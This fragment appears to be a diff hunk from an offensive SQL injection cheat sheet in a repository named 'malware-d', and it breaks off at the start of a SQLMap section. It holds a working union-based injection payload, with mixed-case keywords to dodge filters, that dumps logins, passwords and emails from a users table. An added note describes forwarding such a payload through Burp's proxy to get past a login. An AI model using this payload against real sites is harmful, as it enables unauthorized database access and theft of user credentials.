malware-d/cheatsheet/sqlmap_cheatsheet.md

 #Collect important data
 1' UniOn Select 1,2,3,gRoUp_cOncaT(login,0x3a,password,0x3a,email) fRoM users--
 ```
+*Note: after using Repeater to check and have found the payload to attack, you can directly use burp to redirect the login.
+Enter the payload at Intercept (Proxy) and press Forward.*
 # SQLMap - Cheetsheat
 ## Basic arguments for SQLmap
 ```console